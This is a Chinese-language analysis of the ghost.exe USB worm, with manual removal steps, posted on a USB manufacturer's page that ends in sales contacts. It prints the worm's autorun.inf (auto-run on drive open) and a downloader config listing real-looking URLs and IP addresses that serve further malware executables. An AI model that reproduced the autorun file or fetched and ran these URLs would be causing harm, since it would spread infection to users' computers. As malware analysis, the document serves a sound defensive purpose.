位置導(dǎo)航:網(wǎng)站首頁<<<U盤行業(yè)知識<<<ghost.exe U盤病毒的查殺
ghost.exe U盤病毒的查殺
今天吃飯前..接到某位mm 求助..說電腦又中毒了..
按照習(xí)慣先叫他掃個SREng 的 log 看看..意外的發(fā)現(xiàn)了個 ghost.exe 和四五個小病毒..
就跟她拿了 ghost.exe 看看.. 又是一個 U 盤病毒 還會下載病毒..
現(xiàn)在寫一點(diǎn)點(diǎn)的小分析 ..目前瑞星不報..在線掃了掃發(fā)現(xiàn)就幾家報了..
運(yùn)行g(shù)host.exe 后..
生成
ghost.exe.bat(刪除自身)
C:\WINDOWS\system\conime.exe
C:\Program Files\WinRAR\WinRAR.exe.tmp
每個盤符下釋放(c d e f g h j k )
autorun.inf
ghost.exe
autorun.inf 文件內(nèi)容
[AutoRun]
OPEN=ghost.exe
shellexecute=ghost.exe
shell\打開(O)\command=ghost.exe
連入下載..
ie.txt 內(nèi)容
[main]
服務(wù)文件更新=5
服務(wù)文件地址=http://www.86dy.net/c123.exe
下載者是否更新=4
下載個數(shù)=7
文件1=http://222.220.16.185/data6/jwm.exe
更新1=6
文件2=http://222.220.16.185/data6/wol.exe
更新2=6
文件3=http://222.220.16.185/data6/wo3.exe
更新3=6
文件4=http://222.220.16.185/data6/mir.exe
更新4=6
文件5=http://222.220.16.185/data6/mhh.exe
更新5=6
文件6=http://222.220.16.181/ienet.exe
更新6=6
文件7=http://222.220.16.185/data6/zt3.exe
更新7=6
這些網(wǎng)址都是下載下來的U盤病毒..
沒寫入注冊表..
但是我用反匯編看了看..
這玩意應(yīng)該修改了
訊雷 QQ WINRAR 的注冊表 ..
處理方法(不包括下載下來的U盤病毒)
右鍵=>打開進(jìn)入每個盤符=>刪除
autorun.inf
ghost.exe
刪除文件
C:\WINDOWS\system\conime.exe
建議重裝 qq 訊雷 WINRAR
U盤訂購熱線:0755-84524848 手機(jī):13928466681 QQ: 384029020 24小時手機(jī)接聽:139 2846 6681 電郵:[email protected] 或與在線客服人員聯(lián)絡(luò)。欲了解更多U盤信 息請進(jìn)正益通U盤廠家的U盤定制網(wǎng)站:http://www.wzmd.net.cn 大客戶聯(lián)系: 13926502725 海外銷售: 0086-755-33078349
點(diǎn)擊更多U盤生產(chǎn)車間視頻實(shí)錄以上就是正益通U盤生產(chǎn)廠家事業(yè)部對于ghost.exe U盤病毒的查殺話題的介紹,還有什么不了解的地方請直接咨詢U盤工廠在線客服,她們會一一為您解答。